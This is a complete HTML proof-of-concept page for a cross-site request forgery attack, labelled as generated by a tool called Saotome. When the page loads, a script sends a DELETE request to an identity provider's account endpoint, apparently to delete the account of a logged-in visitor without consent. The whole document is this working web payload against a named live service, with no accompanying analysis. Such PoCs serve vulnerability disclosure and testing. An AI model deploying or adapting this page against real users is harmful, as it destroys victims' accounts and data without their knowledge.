<html>
  <!-- CSRF PoC - generated by Saotome -->
  <body>
    <script>
      const xhr = new XMLHttpRequest();
      xhr.open("DELETE", "https://hub.yoti.com/iam/api/me");
      xhr.send();
    </script>
  </body>
</html>
